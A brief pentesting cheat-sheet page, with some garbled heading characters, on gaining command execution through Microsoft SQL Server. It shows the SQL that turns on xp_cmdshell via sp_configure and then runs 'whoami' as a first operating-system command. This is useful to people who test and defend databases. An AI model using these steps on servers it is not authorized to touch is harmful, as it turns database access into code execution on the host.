π‘ Command Execution β
π» Executing Commands on MSSQL β
MSSQL allows for the execution of system commands using xp_cmdshell. However, this feature might be disabled by default and needs to be enabled.
Enable xp_cmdshell β
Enable the module.
sql
enable_xp_cmdshell;sql
EXEC sp_configure 'show advanced options', '1';
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', '1';
RECONFIGURE;Execute a Command β
Once xp_cmdshell is enabled, we can execute system commands.
sql
exec xp_cmdshell 'whoami';